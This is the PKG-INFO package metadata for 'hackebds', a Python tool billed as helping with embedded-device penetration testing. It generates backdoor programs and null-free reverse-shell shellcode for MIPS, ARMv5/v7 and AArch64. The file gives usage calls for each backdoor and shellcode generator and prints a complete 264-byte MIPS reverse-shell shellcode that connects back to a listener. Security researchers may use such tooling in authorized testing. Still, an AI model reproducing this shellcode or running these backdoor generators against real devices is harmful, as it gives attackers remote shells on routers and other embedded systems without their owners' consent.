PKG-INFO

Metadata-Version: 2.1
Name: hackebds
Version: 0.0.9
Summary: This tool is used for backdoor and shellcode generation for various architecture devices
Home-page: https://github.com/doudoudedi/hackEmbedded
Author: doudoudedi
Author-email: doudoudedi233@gmail.com
License: MIT
Description: # introduction
        
        ## foreword
        
        >In the process of penetration and vulnerability mining of embedded devices, many problems have been encountered. One is that some devices do not have telnetd or ssh services to obtain an interactive shell, and the other is that memory corruption vulnerabilities such as stack overflow are usually Null bytes are truncated, so it is more troublesome to construct reverse_shellcode, so this tool was developed to exploit the vulnerability. This tool is developed based on the PWN module and currently uses the python2 language
        
        ## fuction
        
        This tool is embedded in the security test of the device. There are two main functions:
        
        1.  Generate **backdoor programs** of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal in size.**Armv5, Armv7, Armv8, mipsel, mips are now supported, and they are still being updated**
        
        2.  Generate **reverse_shell shellcode** of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. **Armv5, Armv7, Armv8, mipsel, mips are now supported, and they are still being updated**
        
        ## install (1)  Highly recommended！！Because the source code compilation may not be updated in time，Please install the latest
        **pip install hackebds==0.0.7**
        ```
        pip install hackebds==0.0.7
        ....
        ```
        #### Instructions for use
        When importing this module will import the pwn module
        
        1. Generate backdoor programs of various architectures, encapsulate pure shellcode, and successfully connect to the shell
        ```
        >>> from hackebds import *
        >>> mipsel_backdoor(reverse_ip,reverse_port)
        >>> mips_backdoor(reverse_ip,reverse_port)
        >>> aarch64_backdoor(reverse_ip,reverse_port)
        >>> armelv5_backdoor(reverse_ip,reverse_port)
        >>> armelv7_backdoor(reverse_ip,reverse_port)
        >>> armebv5_backdoor(reverse_ip,reverse_port)
        >>> armebv7_backdoor(reverse_ip,reverse_port)
        ```
        expample:
        ```
        >>> mipsel_backdoor("127.0.0.1",5566)
        mipsel_backdoor is ok in current path ./
        >>> 
        ```
        2. Generates the use-back shellcode (no free) null bytes corresponding to various architectures
        
        ```
        >>> from hackebds import *
        >>> mipsel_reverse_sl(reverse_ip,reverse_port)
        >>> mips_reverse_sl(reverse_ip,reverse_port)
        >>> aarch64_reverse_sl(reverse_ip,reverse_port)
        >>> armelv5_reverse_sl(reverse_ip,reverse_port)
        >>> armelv7_reverse_sl(reverse_ip,reverse_port)
        >>> armebv5_reverse_sl(reverse_ip,reverse_port)
        >>> armebv7_backdoor(reverse_ip,reverse_port)
        ```
        example:
        ```
        >>> from hackebds import *
        >>> shellcode=mipsel_reverse_sl("127.0.0.1",5566)
        [+] No NULL byte shellcode for hex(len is 264):
        \xfd\xff\x19\x24\x27\x20\x20\x03\xff\xff\x06\x28\x57\x10\x02\x34\xfc\xff\xa4\xaf\xfc\xff\xa5\x8f\x0c\x01\x01\x01\xfc\xff\xa2\xaf\xfc\xff\xb0\x8f\xea\x41\x19\x3c\xfd\xff\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xff\xfe\x19\x3c\x80\xff\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\x20\x28\xa0\x03\xef\xff\x19\x24\x27\x30\x20\x03\x4a\x10\x02\x34\x0c\x01\x01\x01\xf7\xff\x85\x20\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfe\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfd\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf8\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\x20\x20\xa0\x03\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf4\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xfc\xff\xa0\xaf\xf4\xff\xbd\x27\xff\xff\x05\x28\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\xfb\xff\x19\x24\x27\x28\x20\x03\x20\x28\xa5\x03\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\x20\x28\xa0\x03\xff\xff\x06\x28\xab\x0f\x02\x34\x0c\x01\x01\x01
        ```
        ## chips and architectures
        Tests can leverage chips and architectures
        
        Mips:
        MIPS 74kc V4.12 big endian
        MIPS 24kc V5.0  little endian
        
        Armv7:
        Allwinner(全志)V3s
        
        Armv8:
        Qualcomm Snapdragon 660
        
        ## updating
         2022.4.19 Added support for aarch64 null-byte reverse_shellcode
         2022.4.30 Reduced amount of code using functions and support python3
        
        ## One-click build environment
        
        To be added
        
Platform: UNKNOWN
Description-Content-Type: text/markdown